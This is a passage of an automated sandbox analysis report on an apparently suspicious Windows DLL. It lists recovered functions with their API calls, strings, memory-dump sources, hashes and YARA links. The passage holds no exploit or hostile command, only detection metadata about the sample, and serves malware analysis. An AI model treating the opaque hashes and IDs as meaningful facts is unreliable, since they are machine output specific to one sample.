                          • Instruction Fuzzy Hash: 45419A7224524AAFEB506EE69D10F9E3724EF12341F046024EF258E154F773DA2AEB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECE1DA0, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 212fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,?,?,?,6ECE1C2E,?), ref: 6ECE1DB5
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,6ECE1C2E,?), ref: 6ECE1DC6
                          • GetConsoleMode.KERNEL32(00000000,?), ref: 6ECE1E08
                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 6ECE1E83
                          • GetLastError.KERNEL32(?,?,?,00000000), ref: 6ECE1F05
                          Strings
                          • assertion failed: !handle.is_null()C:wzsrrzyhpokwddixmxfulwzhcndebeithwkkhwbuyssisqxbeobnryngrerqutlqsjvizxvibhexzqwhpywnaymoprangqwwlydycgacflwbjqxhaclrecozjqfmkoreeed, xrefs: 6ECE200E
                          • Unexpected number of bytes for incomplete UTF-8 codepoint.C:eodllautblkklahmhgnetilzvvcslfjwakfzrpeciobxpylgwrokyyfkblnopnjvhlcoxjbvrndpaoezowltgjwguuqlcjtinialvpbtfcixalgwrcjcrthjdwukfjvq, xrefs: 6ECE1FF5
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ErrorLast$ConsoleFileHandleModeWrite
                          • String ID: Unexpected number of bytes for incomplete UTF-8 codepoint.C:eodllautblkklahmhgnetilzvvcslfjwakfzrpeciobxpylgwrokyyfkblnopnjvhlcoxjbvrndpaoezowltgjwguuqlcjtinialvpbtfcixalgwrcjcrthjdwukfjvq$assertion failed: !handle.is_null()C:wzsrrzyhpokwddixmxfulwzhcndebeithwkkhwbuyssisqxbeobnryngrerqutlqsjvizxvibhexzqwhpywnaymoprangqwwlydycgacflwbjqxhaclrecozjqfmkoreeed
                          • API String ID: 4172320683-607870617
                          • Opcode ID: 00b855beb31fa84bfdeb5c9c49275ba61a9a4221f03e0e1bf43218fe746116f0
                          • Instruction ID: c27eec18e038c83fcfd6de5e3b153aa18ce3ac79bbd236d29f780461767abd9c
                          • Opcode Fuzzy Hash: 00b855beb31fa84bfdeb5c9c49275ba61a9a4221f03e0e1bf43218fe746116f0
                          • Instruction Fuzzy Hash: 2B71D1B16083459FD7188F9AD8547AB7BE5BB86304F10882CE4E687B84E731D95CCB53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDC690, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 95memoryCOMMON
                          Download Yara Rule
                          APIs
                          • AcquireSRWLockExclusive.KERNEL32(6ED2ADA8), ref: 6ECDC6C9
                          • ReleaseSRWLockExclusive.KERNEL32(6ED2ADA8), ref: 6ECDC713
                          • GetProcessHeap.KERNEL32 ref: 6ECDC722
                          • HeapAlloc.KERNEL32(011C0000,00000000,00000020), ref: 6ECDC735
                          • ReleaseSRWLockExclusive.KERNEL32(6ED2ADA8), ref: 6ECDC787
                          Strings
                          • failed to generate unique thread ID: bitspace exhausted, xrefs: 6ECDC794
                          • called `Option::unwrap()` on a `None` value, xrefs: 6ECDC7B7
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ExclusiveLock$HeapRelease$AcquireAllocProcess
                          • String ID: called `Option::unwrap()` on a `None` value$failed to generate unique thread ID: bitspace exhausted
                          • API String ID: 1780889587-1657987152
                          • Opcode ID: f157ec2bde68b1d0481a1d77dc37dc1b62496ba93265f1db2b18e43d33e13ed1
                          • Instruction ID: bb93b36834f90fb39008c09770812a38c6f052622099af679ed277952b3e6dc7
                          • Opcode Fuzzy Hash: f157ec2bde68b1d0481a1d77dc37dc1b62496ba93265f1db2b18e43d33e13ed1
                          • Instruction Fuzzy Hash: 7631E271E006048FEB548FD4DA14B9EBBB9EF85328F114169DA24AB384E7759809CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECD10A0, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 141memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32 ref: 6ECD10D6
                          • HeapAlloc.KERNEL32(011C0000,00000000,0000000F), ref: 6ECD10ED
                          • GetProcessHeap.KERNEL32(011C0000,00000000,0000000F), ref: 6ECD111F
                          • HeapAlloc.KERNEL32(011C0000,00000000,00000010,011C0000,00000000,0000000F), ref: 6ECD1136
                          • HeapFree.KERNEL32(00000000,?,00000000,00000010,011C0000,00000000,0000000F), ref: 6ECD120B
                          • HeapFree.KERNEL32(00000000,?,00000000,00000010,011C0000,00000000,0000000F), ref: 6ECD121B
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Heap$AllocFreeProcess
                          • String ID: Control_RunDLL$Control_RunDLL
                          • API String ID: 2113670309-2490747307
                          • Opcode ID: 54b1b3c7fe46cd5e536666a4752f096958d294aaf34f52675934a197fe73d383
                          • Instruction ID: dea31941f8224420cf768093ffcbf788dff111aeb28c16c390041ead2c6769df
                          • Opcode Fuzzy Hash: 54b1b3c7fe46cd5e536666a4752f096958d294aaf34f52675934a197fe73d383
                          • Instruction Fuzzy Hash: 1151B175D00609DFDB00CFE9C840BEEB7B6FF49344F108569EA046B254E7769849CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECEC860, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                          Download Yara Rule
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 6ECEC897
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6ECEC89F
                          • _ValidateLocalCookies.LIBCMT ref: 6ECEC928
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6ECEC953
                          • _ValidateLocalCookies.LIBCMT ref: 6ECEC9A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: 30671b1d1ddf6d949dc6219769a72a061f8e980b12d1956ae54d8f68879fd9f4
                          • Instruction ID: 35fd0a8a4cdc69e9e007a9d4ad38bd5481f5bfc799be81cd20c9e2c5c14a614b
                          • Opcode Fuzzy Hash: 30671b1d1ddf6d949dc6219769a72a061f8e980b12d1956ae54d8f68879fd9f4
                          • Instruction Fuzzy Hash: 27418F34E00249AFCF00CFA9C894E9EBFB9AF45328F108555E8285F756E7319A15CBD1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECE2B10, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111memoryCOMMON
                          Download Yara Rule
                          APIs
                          • AcquireSRWLockExclusive.KERNEL32(6ED2ADB4), ref: 6ECE2B44
                          • TlsAlloc.KERNEL32 ref: 6ECE2B5A
                          • GetProcessHeap.KERNEL32 ref: 6ECE2B74
                          • HeapAlloc.KERNEL32(011C0000,00000000,0000000C), ref: 6ECE2B8B
                          • ReleaseSRWLockExclusive.KERNEL32(6ED2ADB4), ref: 6ECE2BC8
                          Strings
                          • assertion failed: key != c::TLS_OUT_OF_INDEXESC:jbmojtgfautxqskitilrxgprrsoryhnjiexhvlejqbbtabuvcjbeqafloiohojnkwxtneumtjxczayjyebuempczgbfbrdwkmdkgjqjcnunttbmcxecyvhxsfpitjjwfpzkycxdjnqi, xrefs: 6ECE2BE8
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocExclusiveHeapLock$AcquireProcessRelease
                          • String ID: assertion failed: key != c::TLS_OUT_OF_INDEXESC:jbmojtgfautxqskitilrxgprrsoryhnjiexhvlejqbbtabuvcjbeqafloiohojnkwxtneumtjxczayjyebuempczgbfbrdwkmdkgjqjcnunttbmcxecyvhxsfpitjjwfpzkycxdjnqi
                          • API String ID: 3228198226-2044759171
                          • Opcode ID: 78aed88853409d9c0b638f3478715511702f11f97996fccbf1215f3edec0e240
                          • Instruction ID: 4b674573b582a45f24334527fe3740e730357bd9380685bc669c0d9519d78913
                          • Opcode Fuzzy Hash: 78aed88853409d9c0b638f3478715511702f11f97996fccbf1215f3edec0e240
                          • Instruction Fuzzy Hash: E44134B190020A8FEB04CFD4D955B9EBBB5FF44318F104529E619AB790EB759849CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECF1BFC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNEL32(00000000,?,6ECF1D09,FFFDD001,00000400,?,00000000,?,?,6ECF1E82,00000021,FlsSetValue,6ED239F8,6ED23A00,?), ref: 6ECF1CBD
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 3664257935-537541572
                          • Opcode ID: 3b3306939a94bdb8341bdf45c05dd77abbcac7a208c6dd2594e6c56e27a05a59
                          • Instruction ID: c1f9ff097e0b2b3d1cd64005edc0f85ce5a432d1f7130cd69e25b3b98b0ec35c
                          • Opcode Fuzzy Hash: 3b3306939a94bdb8341bdf45c05dd77abbcac7a208c6dd2594e6c56e27a05a59
                          • Instruction Fuzzy Hash: E6212EB2A01625EFDB5147AADD54F8A3778EF433A4B100510E912A7289F770E907C6E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECECCFF, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(00000001,?,6ECECA41,6ECEA8E2,6ECEA0EC,?,6ECEA324,?,00000001,?,?,00000001,?,6ED27DA8,0000000C,6ECEA41D), ref: 6ECECD0D
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6ECECD1B
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6ECECD34
                          • SetLastError.KERNEL32(00000000,6ECEA324,?,00000001,?,?,00000001,?,6ED27DA8,0000000C,6ECEA41D,?,00000001,?), ref: 6ECECD86
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: 22177db44986f79f02811e9185bed6e7f2ba7e8998f1d175b417a62da611934f
                          • Instruction ID: 200273ae587940ac287372cf4ad4e17dd3619dd22bcb24c98467a6e74afa442a
                          • Opcode Fuzzy Hash: 22177db44986f79f02811e9185bed6e7f2ba7e8998f1d175b417a62da611934f
                          • Instruction Fuzzy Hash: C2012433209B515EFB6016FD6C8CDC72E69EB833B83200329E62C699D4FF2299024560
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECE97A0, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6ECE9E50: GetTickCount64.KERNEL32 ref: 6ECE9E57
                          • GetTickCount64.KERNEL32 ref: 6ECE97D6
                          • GetTickCount64.KERNEL32 ref: 6ECE97F4
                          • GetTickCount64.KERNEL32 ref: 6ECE980D
                          • GetTickCount64.KERNEL32 ref: 6ECE980F
                          • GetTickCount64.KERNEL32 ref: 6ECE9816
                          • GetTickCount64.KERNEL32 ref: 6ECE9834
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Count64Tick
                          • String ID:
                          • API String ID: 1927824332-0
                          • Opcode ID: b2b9b75161159711c5a67b992637354ff35e42f5a3efd4bb5cf0169e6bd71bf1
                          • Instruction ID: d7f77e4754110b01313826b3417a3bb093ba7fcdab418cdfac1115e595e5b15d
                          • Opcode Fuzzy Hash: b2b9b75161159711c5a67b992637354ff35e42f5a3efd4bb5cf0169e6bd71bf1
                          • Instruction Fuzzy Hash: 6C018023C34A189DE203AA79A84215AA67D6FA73D8F11C353E04A37012FB9014E386A2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECD6D10, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • _!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool, xrefs: 6ECD6D7A, 6ECD6DB5
                          • 'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6ECD6D24
                          • {invalid syntax}, xrefs: 6ECD6D54
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: __aulldiv__aullrem
                          • String ID: 'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool${invalid syntax}
                          • API String ID: 3839614884-2364648981
                          • Opcode ID: 4ebce2665fd155c2f6a72185b1ff70cc58905971634ca5ca80185fb238db5266
                          • Instruction ID: 74eff8bd37c0f1c80d8fb5acebae2dbde8b0ded22689a53bd5eca577bb04d086
                          • Opcode Fuzzy Hash: 4ebce2665fd155c2f6a72185b1ff70cc58905971634ca5ca80185fb238db5266
                          • Instruction Fuzzy Hash: 98416C717186004BD3149AEDE840BAAB6D99F84744F10453DEA899F3DAF666C809C292
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDD1B0, Relevance: 8.8, APIs: 7, Instructions: 85memoryCOMMON
                          Download Yara Rule
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00000001,6ECDC906), ref: 6ECDD1BB
                          • TlsGetValue.KERNEL32(00000000,00000001,6ECDC906), ref: 6ECDD1D3
                          • TlsGetValue.KERNEL32(00000000), ref: 6ECDD1F3
                          • TlsGetValue.KERNEL32(00000000), ref: 6ECDD213
                          • GetProcessHeap.KERNEL32 ref: 6ECDD226
                          • HeapAlloc.KERNEL32(011C0000,00000000,0000000C), ref: 6ECDD239
                          • TlsSetValue.KERNEL32(00000000,00000000,011C0000,00000000,0000000C), ref: 6ECDD266
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Value$Heap$AllocProcess
                          • String ID:
                          • API String ID: 3559649508-0
                          • Opcode ID: bc84efa85cfc67f21f14a5ddee89e085df959393fc7a76460447b8e7557f46a2
                          • Instruction ID: f24b5975964de10a0d6a6d1578647d8a5d95f36be604e9af09a24fdde42b50bd
                          • Opcode Fuzzy Hash: bc84efa85cfc67f21f14a5ddee89e085df959393fc7a76460447b8e7557f46a2
                          • Instruction Fuzzy Hash: 58112E72B406029BEB505BF6DA64B163AACEF02655F024924EA12DB648F736DC45CE70
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECF0EB1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                          Download Yara Rule
                          Strings
                          • C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6ECF0ECD
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: C:\Windows\SYSTEM32\loaddll32.exe
                          • API String ID: 0-1872383224
                          • Opcode ID: c6376ffc2b1f1006ac25762d4982cdad0306e375c45e2c2ad992dc1d1efe3b62
                          • Instruction ID: 725ea1f8310d6a6af4e1defd13dbe640e7c4b6644b6f03153e9cb2e7ce85b344
                          • Opcode Fuzzy Hash: c6376ffc2b1f1006ac25762d4982cdad0306e375c45e2c2ad992dc1d1efe3b62
                          • Instruction Fuzzy Hash: 1B21A132218209FFD7909FE6DC51D8B77BEEF41768B104919E859D7248F731E8428790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECEDD62, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNEL32(00000000,?,?,6ECEDE23,00000000,?,00000001,00000000,?,6ECEDE9A,00000001,FlsFree,6ED22F84,FlsFree,00000000), ref: 6ECEDDF2
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: api-ms-
                          • API String ID: 3664257935-2084034818
                          • Opcode ID: 3e3a39a60a0fd499f8e8f0e3292d8c0557d5cda9ea99d0a5d0e5db3f67b7027f
                          • Instruction ID: 7ab57261aed994dc20942d61160ebc8cd9cf9863c6a411f8dafa41c801a0011a
                          • Opcode Fuzzy Hash: 3e3a39a60a0fd499f8e8f0e3292d8c0557d5cda9ea99d0a5d0e5db3f67b7027f
                          • Instruction Fuzzy Hash: AC11A733A55625AFDF124AF99C40BCE3B64AF42760F100211F921AB688E770EA018AF5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECEEC2D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,FF3209D9,00000000,?,00000000,6ECF7473,000000FF,?,6ECEEBBD,?,?,6ECEEB91,?), ref: 6ECEEC62
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6ECEEC74
                          • FreeLibrary.KERNEL32(00000000,?,00000000,6ECF7473,000000FF,?,6ECEEBBD,?,?,6ECEEB91,?), ref: 6ECEEC96
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 1215f2f71032ab590bc413a7a2a51eace984ce15899b60d0409faa2d8ea83652
                          • Instruction ID: 25151d04b81681d3171fd57df8b76c6f35e25a6eac2957b838d82ecb0c090ef2
                          • Opcode Fuzzy Hash: 1215f2f71032ab590bc413a7a2a51eace984ce15899b60d0409faa2d8ea83652
                          • Instruction Fuzzy Hash: 0C01A772900956EFDF018F90CE09FAEBBB9FF05754F000625F822A6690DB78A500CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDC4C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll), ref: 6ECDC4C5
                          • GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 6ECDC4D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: NtCreateKeyedEvent$ntdll
                          • API String ID: 1646373207-1373576770
                          • Opcode ID: a0697e37fd99cb95b49effa95fe1225ae23a824925671e166e430b54c16e7069
                          • Instruction ID: 6fa6106c7db3091d8b94677d1574d3a5cd8ba1d63fc0362f1b4c4a8fb9bd210c
                          • Opcode Fuzzy Hash: a0697e37fd99cb95b49effa95fe1225ae23a824925671e166e430b54c16e7069
                          • Instruction Fuzzy Hash: 83B09272A0CD816A9E906BF27B0CE662A38AD413163828440A527DA500DB308108E921
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDC480, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll), ref: 6ECDC485
                          • GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 6ECDC495
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: NtWaitForKeyedEvent$ntdll
                          • API String ID: 1646373207-2815205136
                          • Opcode ID: 2b80b0f86361d95882b3ab2655782390ebbb1a90feabfefc8579af2077970cf5
                          • Instruction ID: e40a8223fd6c5ee4d1a789e4b70fa5d659f36b63cffc4c04b0f1e91f2c7a4e98
                          • Opcode Fuzzy Hash: 2b80b0f86361d95882b3ab2655782390ebbb1a90feabfefc8579af2077970cf5
                          • Instruction Fuzzy Hash: 1CB09272A0CE81669E906BF27B0CE662A38AD412163424544A52BD9100DB30C108ED26
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDC4A0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll), ref: 6ECDC4A5
                          • GetProcAddress.KERNEL32(00000000,NtReleaseKeyedEvent), ref: 6ECDC4B5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: NtReleaseKeyedEvent$ntdll
                          • API String ID: 1646373207-31681898
                          • Opcode ID: 2e7ca47452d6e6f8d7963416753f5fe8c755e5b4e1f449366ec1d24a6e5e61df
                          • Instruction ID: 1ec5361fc4051195953a116c11a6faddfed742251e73016d2befe7d32732d1a4
                          • Opcode Fuzzy Hash: 2e7ca47452d6e6f8d7963416753f5fe8c755e5b4e1f449366ec1d24a6e5e61df
                          • Instruction Fuzzy Hash: 9DB092B2A0CDC1669E906BF27B0CEA62A39AD412163424444B927D9200EB34D108E921
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDC440, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32), ref: 6ECDC445
